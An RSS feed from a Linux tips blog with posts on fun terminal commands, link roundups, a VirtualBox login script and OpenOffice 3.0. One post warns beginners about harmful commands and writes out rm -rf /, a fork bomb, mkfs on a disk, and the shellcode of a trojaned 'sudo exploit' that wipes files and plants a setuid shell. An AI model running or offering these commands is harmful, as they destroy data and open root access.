<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Quick Tweaks &#187; Linux</title>
	<atom:link href="http://www.quicktweaks.com/tag/linux/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.quicktweaks.com</link>
	<description>Quick Tweaks For Your System</description>
	<lastBuildDate>Fri, 27 Nov 2009 22:29:24 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.8.6</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>10 Linux commands for fun</title>
		<link>http://www.quicktweaks.com/2009/11/26/10-linux-commands-for-fun/</link>
		<comments>http://www.quicktweaks.com/2009/11/26/10-linux-commands-for-fun/#comments</comments>
		<pubDate>Thu, 26 Nov 2009 22:09:46 +0000</pubDate>
		<dc:creator>ashokgelal</dc:creator>
				<category><![CDATA[Linux]]></category>
		<category><![CDATA[Terminal]]></category>
		<category><![CDATA[commands]]></category>
		<category><![CDATA[fun]]></category>

		<guid isPermaLink="false">http://www.quicktweaks.com/?p=309</guid>
		<description><![CDATA[Here are few Linux commands you can play with for fun. Some of these might be helpful in certain situations but I've compiled them here so that you can play with it, appreciate the power of Linux commands, or just show off your Linux skills to your friends.


No related posts.

Related posts brought to you by <a href='http://mitcho.com/code/yarpp/'>Yet Another Related Posts Plugin</a>.]]></description>
			<content:encoded><![CDATA[<p>Here are few Linux commands you can play with for fun. Some of these might be helpful in certain situations but I&#8217;ve compiled them here so that you can play with it, appreciate the power of Linux commands, or just show off your Linux skills to your friends.</p>
<p><span id="more-309"></span>Let me warn you first &#8211; these commands are not for newbies, those who just started using Linux or for those who want to start with Linux terminal.</p>
<p style="text-align: center;"><script type="text/javascript"><!--
google_ad_client = "pub-0816309066023726";
google_ad_slot = "7783831711";
google_ad_width = 468;
google_ad_height = 60;
//--></script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
</p>
<h3><span style="color: #ff6600;">#1 Browse and display images in Terminal</span></h3>
<p>Browse and display images in Terminal? Yes! To browse the images in the current directory:<br />
<code>$ sudo zgv</code><br />
To browse the images in /home/username/pictures directory:<br />
<code>$ sudo zgv <em>/home/username/pictures</em></code></p>
<p>Note: If you get any mouse not initialized message, just unplug your mouse, type <em>zgv </em>and plug your mouse back</p>
<h3><span style="color: #ff6600;">#2 Burn a CD/DVD/BluRay Disk<br />
</span></h3>
<p>Llet’s add a small twist; make an ISO image of a large folder and burn them to a CD/DVD.<br />
Crate an ISO image (myISOFile) out of a folder (or filename)<br />
<code>$ mkisofs –r –o <em>myISOFile.ISO folderOrFilename</em></code><br />
Now burn the above ISO image to a CD/DVD<br />
<code>$ cdrecord --device=<em>cdwriter-device</em> -tao -eject <em>myISOFile.ISO</em></code></p>
<h3><span style="color: #ff6600;">#3 Create ASCII text graphics</span></h3>
<p>What about creating some ASCII graphics such as the following? You can paste it in your email as a signature to impress your friends <img src='http://www.quicktweaks.com/wp-includes/images/smilies/icon_wink.gif' alt=';-)' class='wp-smiley' /> </p>
<pre> _     _
| |   (_)_ __  _   ___  __
| |   | | '_ \| | | \ \/ /
| |___| | | | | |_| |&gt;  &lt;
|_____|_|_| |_|\__,_/_/\_\</pre>
<p><code>$ figlet <em>Linux</em></code><br />
This is displayed with the default font, to use other fonts, give a font name after switch f:<br />
<code>$ figlet <em>quick tweaks</em> –f <em>script</em></code></p>
<pre><strong>                      _                            _
             o       | |                          | |
 __,             __  | |    _|_          _   __,  | |   ,
/  |  |   |  |  /    |/_)    |  |  |  |_|/  /  |  |/_) / \_
\_/|_/ \_/|_/|_/\___/| \_/   |_/ \/ \/  |__/\_/|_/| \_/ \/
   |\
   |/    

</strong><code>$ figlet <em>Quick Tweaks</em> –f <em>script</em></code></pre>
<pre>  _ \       _)      |    __ __|                   |
 |   | |   | |  __| |  /    |\ \  \   / _ \  _` | |  /  __|
 |   | |   | | (      &lt;     | \ \  \ /  __/ (   |   &lt; \__ \
 \__\_\\__,_|_|\___|_|\_\  _|  \_/\_/ \___|\__,_|_|\_\____/</pre>
<p>The fonts for <em>figlet </em>are installed in <strong>/usr/share/figlet</strong> directory</p>
<h3><span style="color: #ff6600;">#4 Run remote applications in full GUI mode<br />
</span></h3>
<p>As a Computer Science student, I often need access my lab computers (which have Fedora installed) through SSH. After I submit my assignments, esp. those GUI based programming assignments, I wanted to check if everything is fine. Accessing remote computer is easy:<br />
<code>$ ssh <em>username@example.com</em></code><br />
If you want to run remote applications such as OpenOffice or Eclipse, just uncomment <strong><code>ForwardX11 yes</code></strong> in <strong>/etc/ssh/ssh_config</strong> file. After that if you type, eclipse, for an example, the remote application will run in full GUI mode.</p>
<h3><span style="color: #ff6600;">#5 Split a large file into several pieces (for easy copy)<br />
</span></h3>
<p>If you have a large file of about 1 GB size and have two CDs to spare (or two thumb drives of 512 MB each), how can you carry that 1GB file?<br />
<code>$ split –b<em>500m</em> <em>myBigFile</em> <em>mySmallFIles</em>.</code><br />
To join the smaller files to get the big files back:<br />
<code>$ cat <em>mySmallFiles</em>.* &gt; <em>myBigFile</em></code></p>
<h3><span style="color: #ff6600;">#6 Take screenshot of a rectangular area and save it as png file</span></h3>
<div id="attachment_51" class="wp-caption aligncenter" style="width: 310px"><a href="http://www.quicktweaks.com/wp-content/uploads/2008/10/myscreenshot.png"><img class="size-medium wp-image-51" title="myscreenshot" src="http://www.quicktweaks.com/wp-content/uploads/2008/10/myscreenshot-300x144.png" alt="My Screenshot" width="300" height="144" /></a><p class="wp-caption-text">Screenshot taken with import command</p></div>
<p><code>$ import –frame <em>myScreenShot.png</em></code></p>
<p>After this command, the mouse pointer changes to a set of cross-hairs; left-click and drag the mouse across an area of the screen and release the mouse to capture the selected area.</p>
<h3><span style="color: #ff6600;">#7 Resize an image, put a border around it, and add a comment</span></h3>
<p><code>$mogrify -geometry <em>300x200</em> -border <em>8x8</em> -comment “<em>Windows Sucks</em>” <em>myScreenShot.png</em></code></p>
<h3><span style="color: #ff6600;">#8 Quickly converting a .wav file to a .mp3 file<br />
</span></h3>
<p><code>$ lame <em>myMusicFile.wav myMusicFile.mp3</em></code></p>
<h3><span style="color: #ff6600;">#9 Display a nicely formatted calendar (or doing some quick maths?)<br />
</span></h3>
<p><code>$ cal <em>1972</em></code></p>
<p>Get the factorial of 10</p>
<p><code>$ calc <em>10!</em></code></p>
<h3><span style="color: #ff6600;">#10 Mirror a website to your computer for offline browsing</span></h3>
<p><code>$ wget -mk <em>http://example.com</em></code></p>
<p style="text-align: center;"><script type="text/javascript"><!--
google_ad_client = "pub-0816309066023726";
google_ad_slot = "7783831711";
google_ad_width = 468;
google_ad_height = 60;
//--></script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
</p>


<p>No related posts.</p>
<p>Related posts brought to you by <a href='http://mitcho.com/code/yarpp/'>Yet Another Related Posts Plugin</a>.</p>]]></content:encoded>
			<wfw:commentRss>http://www.quicktweaks.com/2009/11/26/10-linux-commands-for-fun/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Linux Talks: They talked about Linux</title>
		<link>http://www.quicktweaks.com/2008/10/24/linux-talks-they-talked-about-linux-2/</link>
		<comments>http://www.quicktweaks.com/2008/10/24/linux-talks-they-talked-about-linux-2/#comments</comments>
		<pubDate>Sat, 25 Oct 2008 05:53:42 +0000</pubDate>
		<dc:creator>ashokgelal</dc:creator>
				<category><![CDATA[Linux Talks]]></category>
		<category><![CDATA[Linux]]></category>

		<guid isPermaLink="false">http://www.quicktweaks.com/?p=246</guid>
		<description><![CDATA[Some links for this weekend:

5 Wallpaper Changer Apps For Linux
Kubuntu 8.10 &#8216;Intrepid Ibex&#8217; Beta Screenshots Tour
WINE Developers Start On Direct3D 10 Support
Dell first ad &#8211; All About Ubuntu Linux
Fedora 10 &#8211; A Detailed Discussion on 13 Prime Features
Linux Foundation values Linux at $10.8 billion, kernel at $1.4 billion
Mac OS is better than Ubuntu Linux: A [...]


No related posts.

Related posts brought to you by <a href='http://mitcho.com/code/yarpp/'>Yet Another Related Posts Plugin</a>.]]></description>
			<content:encoded><![CDATA[<p>Some links for this weekend:</p>
<ul>
<li><a href="http://www.makeuseof.com/tag/5-wallpaper-changer-apps-for-linux/" target="_blank">5 Wallpaper Changer Apps For Linux</a></li>
<li><a href="http://tuxarena.blogspot.com/2008/10/kubuntu-810-intrepid-ibex-beta.html" target="_blank">Kubuntu 8.10 &#8216;Intrepid Ibex&#8217; Beta Screenshots Tour</a></li>
<li><a href="http://www.phoronix.com/scan.php?page=news_item&amp;px=NjgxMA" target="_blank">WINE Developers Start On Direct3D 10 Support</a></li>
<li><a href="http://www.tribbleagency.com/?p=2827" target="_blank">Dell first ad &#8211; All About Ubuntu Linux</a></li>
<li><a href="http://blog.taragana.com/index.php/archive/fedora-10-a-detailed-discussion-on-the-features/" target="_blank">Fedora 10 &#8211; A Detailed Discussion on 13 Prime Features</a></li>
<li><a href="http://www.tgdaily.com/content/view/39881/118/" target="_blank">Linux Foundation values Linux at $10.8 billion, kernel at $1.4 billion</a></li>
<li><a href="http://prosenjit23.wordpress.com/2008/10/21/ubuntu-vs-mac-os-truths-and-myths/" target="_blank">Mac OS is better than Ubuntu Linux: A myth</a></li>
<li><a href="http://helpforlinux.blogspot.com/2008/10/5-gmail-notifiers-for-linux.html" target="_blank">5 Gmail Notifiers For Linux</a></li>
<li><a href="http://www.tectonic.co.za/?p=3447" target="_blank">Ubuntu explains OpenOffice.org 3.0 decision </a></li>
<li><a href="http://www.ubuntukungfu.org/blog/2008/09/9-tips-for-ubuntu-notebook-users/" target="_blank">9 tips for Ubuntu notebook users</a></li>
</ul>


<p>No related posts.</p>
<p>Related posts brought to you by <a href='http://mitcho.com/code/yarpp/'>Yet Another Related Posts Plugin</a>.</p>]]></content:encoded>
			<wfw:commentRss>http://www.quicktweaks.com/2008/10/24/linux-talks-they-talked-about-linux-2/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Fun with Linux Commands-II &#8211; With Power Comes Responsibility</title>
		<link>http://www.quicktweaks.com/2008/10/24/fun-with-linux-commands-ii-with-power-comes-responsibility/</link>
		<comments>http://www.quicktweaks.com/2008/10/24/fun-with-linux-commands-ii-with-power-comes-responsibility/#comments</comments>
		<pubDate>Sat, 25 Oct 2008 02:43:04 +0000</pubDate>
		<dc:creator>ashokgelal</dc:creator>
				<category><![CDATA[TerminalFunFive]]></category>
		<category><![CDATA[commands]]></category>
		<category><![CDATA[Linux]]></category>
		<category><![CDATA[Terminal]]></category>

		<guid isPermaLink="false">http://www.quicktweaks.com/?p=244</guid>
		<description><![CDATA[Happy Linux Commanding! But be careful!
The heading is self-explanatory. Linux Terminal seems dump but nothing is more clever than it. Linux is powerful and fun. When it is about something&#8217;s strength remember what Uncle Ben said.
When you are new to Linux you often seek to get help from others and almost most of the advices [...]


Related posts:<ol><li><a href='http://www.quicktweaks.com/2009/11/26/10-linux-commands-for-fun/' rel='bookmark' title='Permanent Link: 10 Linux commands for fun'>10 Linux commands for fun</a> <small>Here are few Linux commands you can play with for...</small></li></ol>

Related posts brought to you by <a href='http://mitcho.com/code/yarpp/'>Yet Another Related Posts Plugin</a>.]]></description>
			<content:encoded><![CDATA[<p>Happy Linux Commanding! But be careful!</p>
<p>The heading is self-explanatory. Linux Terminal seems dump but nothing is more clever than it. Linux is powerful and fun. When it is about something&#8217;s strength remember what <a title="Uncle Ben says Linux is powerful ;-)" href="http://www.imdb.com/title/tt0145487/quotes" target="_blank">Uncle Ben said</a>.</p>
<p>When you are new to Linux you often seek to get help from others and almost most of the advices you get will be in the form of some commands such as<code> ps, top, modprobe, lspci</code> etc. Be careful when you run these commands as some <a title="Harmful tips for Linux" href="http://linsux.org/index.php?topic=96.0" target="_blank">Anti-Linux a**holes try to fool new Linux users in the name of tips and tutorials</a>.If after following such command(s), you lose all your files, no one is to be blamed but you.</p>
<p><span id="more-244"></span></p>
<p>If you want save yourself, here is one principle: Be aware of what you are doing! Just don&#8217;t do what someone suggest you. Fireup <em>man</em> page, look what the command is about. This way you can learn a couple of more options too. If you are in doubt about the commands, go to a couple of forums and put all information you have such as: <strong>Hello I was trying to do this, and a guy from <em>forum.xyz.com</em> suggest me to issue this command. I suspect this is a harmful command. Any suggestions?</strong> Take my words, Linux carries a strong spirit with it &#8211; spirit to share knowledge. And you will get some good explanatory suggestions very quickly. If you are still in doubt, I suggest you to issue the commands inside virtual OS:</p>
<p style="text-align: center;"><script type="text/javascript"><!--
google_ad_client = "pub-0816309066023726";
google_ad_slot = "7783831711";
google_ad_width = 468;
google_ad_height = 60;
//--></script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
</p>
<p>Last thing first. Today I will be posting some harmful Linux commands. DO NOT ISSUE THESE COMMANDS! These commands are just for your information. These commands are not made for making harm to your computer, but with a couple of options it can be very dangerous. After all Linux doesn&#8217;t know that a folder inside your home directory contains your first girlfriend&#8217;s picture! It is your duty to ensure they are safe. Let&#8217;s get started. I repeat <strong>DON&#8217;T ISSUE THESE COMMANDS</strong>. If you want to test, I suggest you to run them inside a virtual Linux OS.</p>
<p>1. The king of all devils:</p>
<p><code>rm -rf /</code></p>
<p>Q. What does <em>rm</em> do?</p>
<p>A. Removes a file</p>
<p>Q. What is <em>r</em>?</p>
<p>A. Recursion. That means inside a folder, of a folder, of a folder and so on</p>
<p>Q. what is <em>f</em>?</p>
<p>A. Force. It means you are saying to the command<em> &#8220;Never ask me anything. Just do what you want to do&#8221;</em></p>
<p>Q. What is <em>/</em></p>
<p>A. Your <em>ROOT</em> directory!</p>
<p>See what it does? <em>Recursively removes all the files inside your root directory without nagging you &#8211; &#8220;Should I delete this?&#8221;<br />
</em><br />
There are various versions of <em>rm</em> available such as:</p>
<p><em>rm -rf .<br />
rm -rf *</em></p>
<p>Not only someone from outside, you yourself can screw up things sometimes. Little knowledge is dangerous! How about this &#8211; you want to delete all the hidden files inside a directory. That&#8217;s easy right? Hidden files are denoted with <strong>.</strong> in front so you might be thinking this command <strong><code>rm - .*</code></strong> Nooooooooooo!!! It will delete all the files one level up of the current directory.</p>
<p>2. How about backing up your home directory or some folders? Never try to do anything such as:</p>
<p><code>mv /home/yourhomedirectory/* /dev/null</code></p>
<p>Q. What is <em>mv</em>?</p>
<p>A. Move files</p>
<p>Q. What is <em>dev/null</em>?</p>
<p>A. Null means nothing. In other words, it is a black-hole.</p>
<p>If you issue above command, it will move all the files inside your home directory to a blackhole.</p>
<p>3. Linux Terminal is not a toy to play, it&#8217;s something to learn and do some productive things. I just mean to warn you don&#8217;t type anything silly and hit enter such as this:</p>
<p><code> <img src='http://www.quicktweaks.com/wp-includes/images/smilies/icon_sad.gif' alt=':(' class='wp-smiley' /> ){:|:&amp;};:</code></p>
<p>Those seem like emoticons but they are actually shell programming stuffs and have special meaning. The above command executes different process freezing your computer and you will get a BSOD, a sort of! <img src='http://www.quicktweaks.com/wp-includes/images/smilies/icon_wink.gif' alt=';-)' class='wp-smiley' /> </p>
<p>4. How about making a Linux filesystem?</p>
<p><code>mkfs.ext3 /dev/sda</code></p>
<p>You hard disk&#8217;s data are gone, and will never come back again. That was a poor farewell party for your documents.</p>
<p>5. Do you know eyes and your knowledge both can lie? Well sometimes. What do you see in the following C file written by someone claiming <a title="sudo off-by-one poc exploit" href="http://seclists.org/fulldisclosure/2007/Aug/0071.html" target="_blank">New sudo off-by-one poc exploit</a>? Any sign of devil?</p>
<blockquote><p><code>...</code></p>
<p>char esp[] __attribute__ ((section(&#8221;.text&#8221;))) /* e.s.p<br />
release */<br />
= &#8220;\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68&#8243;<br />
&#8220;\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99&#8243;<br />
&#8220;\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7&#8243;<br />
&#8220;\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56&#8243;<br />
&#8220;\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31&#8243;<br />
&#8220;\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69&#8243;<br />
&#8220;\x6e\x2f\x73\x68\x00\x2d\x63\x00&#8243;<br />
&#8220;cp -p /bin/sh /tmp/.beyond; chmod 4755<br />
/tmp/.beyond;&#8221;;</p>
<p>&#8230;</p></blockquote>
<p>Well this is a hex coded version of <code><strong>rm -rf ~ / &amp;</strong></code> . This does nothing more than wiping off your home directory.</p>
<p>These are only a few guidelines you need to follow. If you know some more, drop them in comments.</p>
<p>If you want to learn Linux, conquer its power, have fun, and be productive, you need to be careful, helpful, and share your knowledge. If you have any knowledge on Linux that you want to share, let us know in comments or shoot me an email.</p>
<p>So what did you learn today?</p>
<p style="text-align: center;"><script type="text/javascript"><!--
google_ad_client = "pub-0816309066023726";
google_ad_slot = "7783831711";
google_ad_width = 468;
google_ad_height = 60;
//--></script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
</p>


<p>Related posts:<ol><li><a href='http://www.quicktweaks.com/2009/11/26/10-linux-commands-for-fun/' rel='bookmark' title='Permanent Link: 10 Linux commands for fun'>10 Linux commands for fun</a> <small>Here are few Linux commands you can play with for...</small></li></ol></p>
<p>Related posts brought to you by <a href='http://mitcho.com/code/yarpp/'>Yet Another Related Posts Plugin</a>.</p>]]></content:encoded>
			<wfw:commentRss>http://www.quicktweaks.com/2008/10/24/fun-with-linux-commands-ii-with-power-comes-responsibility/feed/</wfw:commentRss>
		<slash:comments>8</slash:comments>
		</item>
		<item>
		<title>Linux Talks: They talked about Linux</title>
		<link>http://www.quicktweaks.com/2008/10/17/linux-talks-they-talked-about-linux/</link>
		<comments>http://www.quicktweaks.com/2008/10/17/linux-talks-they-talked-about-linux/#comments</comments>
		<pubDate>Sat, 18 Oct 2008 04:21:19 +0000</pubDate>
		<dc:creator>ashokgelal</dc:creator>
				<category><![CDATA[Linux]]></category>
		<category><![CDATA[Linux Talks]]></category>
		<category><![CDATA[articles]]></category>
		<category><![CDATA[links]]></category>
		<category><![CDATA[talks]]></category>
		<category><![CDATA[Tux]]></category>

		<guid isPermaLink="false">http://www.quicktweaks.com/?p=215</guid>
		<description><![CDATA[Hey Tux lovers, here are some good articles:

Advanced Tips For The ps Command
How to Find duplicate copies of files Using fdupes in Ubuntu
Ubuntu 8.10 Coming Soon
5 Things I Wish Linux Had
Making The Switch To Linux &#8211; Keep In Mind … (10 Ubuntu Tips)
Three Cool 3D Car Racing Games for Linux
Quick Look at KDE 4.2-SVN
Switch to [...]


Related posts:<ol><li><a href='http://www.quicktweaks.com/2009/11/26/10-linux-commands-for-fun/' rel='bookmark' title='Permanent Link: 10 Linux commands for fun'>10 Linux commands for fun</a> <small>Here are few Linux commands you can play with for...</small></li></ol>

Related posts brought to you by <a href='http://mitcho.com/code/yarpp/'>Yet Another Related Posts Plugin</a>.]]></description>
			<content:encoded><![CDATA[<p>Hey Tux lovers, here are some good articles:</p>
<ul>
<li><span style="color: #ff6600;"><a href="http://www.linuxplanet.com/linuxplanet/tutorials/6558/1/" target="_blank">Advanced Tips For The ps Command</a></span></li>
<li><span style="color: #ff6600;"><a href="http://www.ubuntugeek.com/how-to-find-duplicate-copies-of-files-using-fdupes-in-ubuntu.html" target="_blank">How to Find duplicate copies of files Using fdupes in Ubuntu</a></span></li>
<li><span style="color: #ff6600;"><a href="http://www.pcmech.com/article/ubuntu-810-coming-soon/" target="_blank">Ubuntu 8.10 Coming Soon</a></span></li>
<li><span style="color: #ff6600;"><a href="http://www.daniweb.com/blogs/entry3288.html" target="_blank">5 Things I Wish Linux Had</a></span></li>
<li><span style="color: #ff6600;"><a href="http://www.mattiasgeniar.be/linux/making-the-switch-to-linux-keep-in-mind-10-ubuntu-tips/" target="_blank">Making The Switch To Linux &#8211; Keep In Mind … (10 Ubuntu Tips)</a></span></li>
<li><span style="color: #ff6600;"><a href="http://www.junauza.com/2008/10/three-cool-3d-car-racing-games-for.html" target="_blank">Three Cool 3D Car Racing Games for Linux</a></span></li>
<li><span style="color: #ff6600;"><a href="http://polishlinux.org/kde/quick-look-at-kde-42-svn/" target="_blank">Quick Look at KDE 4.2-SVN</a></span></li>
<li><span style="color: #ff6600;"><a href="http://prosenjit23.wordpress.com/2008/10/17/switch-to-ubuntu-linux-not-apple-mac-os/" target="_blank">Switch to Ubuntu Linux not Apple Mac OS</a></span></li>
<li><span style="color: #ff6600;"><a href="http://www.junauza.com/2008/02/freeopen-source-digital-audio-editors.html" target="_blank">Free/Open-source Digital Audio Editors</a></span></li>
<li><span style="color: #ff6600;"><a href="http://www.linuxtoday.com/infrastructure/2008101703035OPBZCY" target="_blank">Professional-Level Photography With Linux, And Nobody Goes To Jail </a></span></li>
</ul>


<p>Related posts:<ol><li><a href='http://www.quicktweaks.com/2009/11/26/10-linux-commands-for-fun/' rel='bookmark' title='Permanent Link: 10 Linux commands for fun'>10 Linux commands for fun</a> <small>Here are few Linux commands you can play with for...</small></li></ol></p>
<p>Related posts brought to you by <a href='http://mitcho.com/code/yarpp/'>Yet Another Related Posts Plugin</a>.</p>]]></content:encoded>
			<wfw:commentRss>http://www.quicktweaks.com/2008/10/17/linux-talks-they-talked-about-linux/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Run your virtual OS directly from GDM in Ubuntu</title>
		<link>http://www.quicktweaks.com/2008/10/14/run-your-virtual-os-directly-from-gdm-in-ubuntu/</link>
		<comments>http://www.quicktweaks.com/2008/10/14/run-your-virtual-os-directly-from-gdm-in-ubuntu/#comments</comments>
		<pubDate>Tue, 14 Oct 2008 16:12:46 +0000</pubDate>
		<dc:creator>ashokgelal</dc:creator>
				<category><![CDATA[Desktop]]></category>
		<category><![CDATA[Linux]]></category>
		<category><![CDATA[Software]]></category>
		<category><![CDATA[System]]></category>
		<category><![CDATA[Terminal]]></category>
		<category><![CDATA[commands]]></category>
		<category><![CDATA[gdm]]></category>
		<category><![CDATA[script]]></category>
		<category><![CDATA[tool]]></category>
		<category><![CDATA[ubuntu]]></category>
		<category><![CDATA[virtualbox]]></category>
		<category><![CDATA[windows xp]]></category>
		<category><![CDATA[xorg]]></category>
		<category><![CDATA[xserver]]></category>

		<guid isPermaLink="false">http://www.quicktweaks.com/?p=154</guid>
		<description><![CDATA[If you regularly run a couple of OS from your VirtualBox and want to login to those OS directly from GDM session, here is a quick way to do it. For this to work you should have already set up your VirtualBox. Here we won't be talking about how to setup VirtualBox but only how to login to a virtual OS from GDM session. 


Related posts:<ol><li><a href='http://www.quicktweaks.com/2009/11/26/10-linux-commands-for-fun/' rel='bookmark' title='Permanent Link: 10 Linux commands for fun'>10 Linux commands for fun</a> <small>Here are few Linux commands you can play with for...</small></li><li><a href='http://www.quicktweaks.com/2009/01/07/kick-ass-guide-for-installing-oracle-on-ubuntu/' rel='bookmark' title='Permanent Link: Kick ass guide for installing Oracle on Ubuntu'>Kick ass guide for installing Oracle on Ubuntu</a> <small>Four steps for installing Oracle on Ubuntu. Steps by steps...</small></li></ol>

Related posts brought to you by <a href='http://mitcho.com/code/yarpp/'>Yet Another Related Posts Plugin</a>.]]></description>
			<content:encoded><![CDATA[<p>If you regularly run a couple of OS from your VirtualBox and want to login to those OS directly from GDM session, here is a quick way to do it. For this to work you should have already set up your VirtualBox. Here we won&#8217;t be talking about how to setup VirtualBox but only how to login to a virtual OS from GDM session.</p>
<p><span id="more-154"></span></p>
<div class="mceTemp mceIEcenter">
<dl id="attachment_187" class="wp-caption aligncenter" style="width: 472px;">
<dt class="wp-caption-dt"><img class="size-full wp-image-187" title="windowsgdm" src="http://www.quicktweaks.com/wp-content/uploads/2008/10/windowsgdm.png" alt="Windows XP GDM" width="462" height="384" /></dt>
<dd class="wp-caption-dd">Windows XP GDM</dd>
<dt class="wp-caption-dt"></dt>
</dl>
</div>
<p><span style="color: #ff6600;">1. Create a bash script with the following contents</span></p>
<p style="text-align: center;"><script type="text/javascript"><!--
google_ad_client = "pub-0816309066023726";
google_ad_slot = "7783831711";
google_ad_width = 468;
google_ad_height = 60;
//--></script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
</p>
<p><code>#!/bin/bash<br />
VirtualBox -startvm <strong><span style="color: #000000;"><em>NameOfYourVirtualOS</em></span></strong></code></p>
<p>Replace <em><strong><span style="text-decoration: line-through;">y</span><span style="text-decoration: line-through;">ourSUPassword</span></strong></em><span style="text-decoration: line-through;"> with your password, and </span><em><strong>NameOfYourVirtualOS</strong></em> with the name that you have given to your virtual OS in VirtualBox.</p>
<p><span style="color: #ff6600;">2. Name it something like <strong><em>windowsXPGDM</em></strong> (if you want to run Windows XP), make it executable, and then copy it to /usr/bin.</span></p>
<p><code>$ chmod 755 windowsXP</code>GDM<br />
<code>$ sudo cp windowsXPGDM /usr/bin</code></p>
<p><span style="color: #ff6600;">2. Go to <strong><em>/usr/share/xsessions</em></strong> and create a new file with the following contents:</span></p>
<p><code>[Desktop Entry]<br />
Encoding=UTF-8<br />
Name=WindowsXP<br />
Comment=My Virtual WindowsXP<br />
Exec=/usr/bin/windowsXPGDM<br />
Icon=<br />
Type=Application </code></p>
<p><span style="color: #ff6600;">3. Save it with a name something like <em><strong>windowsXP.desktop</strong></em>.</span></p>
<p><span style="color: #ff6600;">4. Log out and you will see a new entry WindowsXP in your GDM session. You can now directly open VirtualBox session without even logging in to your Ubuntu machine.</span></p>
<p style="text-align: center;"><script type="text/javascript"><!--
google_ad_client = "pub-0816309066023726";
google_ad_slot = "7783831711";
google_ad_width = 468;
google_ad_height = 60;
//--></script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
</p>


<p>Related posts:<ol><li><a href='http://www.quicktweaks.com/2009/11/26/10-linux-commands-for-fun/' rel='bookmark' title='Permanent Link: 10 Linux commands for fun'>10 Linux commands for fun</a> <small>Here are few Linux commands you can play with for...</small></li><li><a href='http://www.quicktweaks.com/2009/01/07/kick-ass-guide-for-installing-oracle-on-ubuntu/' rel='bookmark' title='Permanent Link: Kick ass guide for installing Oracle on Ubuntu'>Kick ass guide for installing Oracle on Ubuntu</a> <small>Four steps for installing Oracle on Ubuntu. Steps by steps...</small></li></ol></p>
<p>Related posts brought to you by <a href='http://mitcho.com/code/yarpp/'>Yet Another Related Posts Plugin</a>.</p>]]></content:encoded>
			<wfw:commentRss>http://www.quicktweaks.com/2008/10/14/run-your-virtual-os-directly-from-gdm-in-ubuntu/feed/</wfw:commentRss>
		<slash:comments>23</slash:comments>
		</item>
		<item>
		<title>Open Office 3.0 final officially announced; expect a record downloads</title>
		<link>http://www.quicktweaks.com/2008/10/13/open-office-30-final-officially-announced-expect-a-record-download/</link>
		<comments>http://www.quicktweaks.com/2008/10/13/open-office-30-final-officially-announced-expect-a-record-download/#comments</comments>
		<pubDate>Mon, 13 Oct 2008 21:19:37 +0000</pubDate>
		<dc:creator>ashokgelal</dc:creator>
				<category><![CDATA[Installation]]></category>
		<category><![CDATA[Linux]]></category>
		<category><![CDATA[Software]]></category>
		<category><![CDATA[alien]]></category>
		<category><![CDATA[apt-get]]></category>
		<category><![CDATA[deb]]></category>
		<category><![CDATA[dpkg]]></category>
		<category><![CDATA[install]]></category>
		<category><![CDATA[OpenOffice]]></category>
		<category><![CDATA[rpms]]></category>
		<category><![CDATA[ubuntu]]></category>
		<category><![CDATA[word]]></category>
		<category><![CDATA[writer]]></category>

		<guid isPermaLink="false">http://www.quicktweaks.com/?p=180</guid>
		<description><![CDATA[As expected, Open Office 3.0 has been officially released today and due to heavy demand for the new release, only a couple of links are available for downloading the packages. The official site is down (literally) and only a plain page appears with a couple of links for downloading the packages.


No related posts.

Related posts brought to you by <a href='http://mitcho.com/code/yarpp/'>Yet Another Related Posts Plugin</a>.]]></description>
			<content:encoded><![CDATA[<p>The packages were already started showing up a couple of days ago and I&#8217;d covered <a href="http://www.quicktweaks.com/2008/10/11/install-openoffice-30-final-in-ubuntu/" target="_blank">a quick way to install Open Office 3.0 final in your Ubuntu box</a>. I can&#8217;t say it for sure, but those packages don&#8217;t seem &#8216;final&#8217; for me but only a snapshot. As expected, Open Office 3.0 has been officially released today and they are having problems to cope with the high downloads demand. <a title="Open Office official website" href="http://distribution.openoffice.org/" target="_blank">The official site</a> is down (literally) and only a plain page appears with a couple of links for downloading the packages. This is what they have to say:</p>
<p><span id="more-180"></span></p>
<blockquote><p>Apologies &#8211; our website is struggling to cope with the unprecedented<br />
demand for the new release 3.0 of OpenOffice.org. The technical teams are<br />
trying to come up with a solution.</p></blockquote>
<p>All this means Open Office 3.0 is all set to create a new record downloads and it deserves for that.</p>
<p>If you want to get your hand on this great free software, here it is how:</p>
<p style="text-align: center;"><script type="text/javascript"><!--
google_ad_client = "pub-0816309066023726";
google_ad_slot = "7783831711";
google_ad_width = 468;
google_ad_height = 60;
//--></script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
</p>
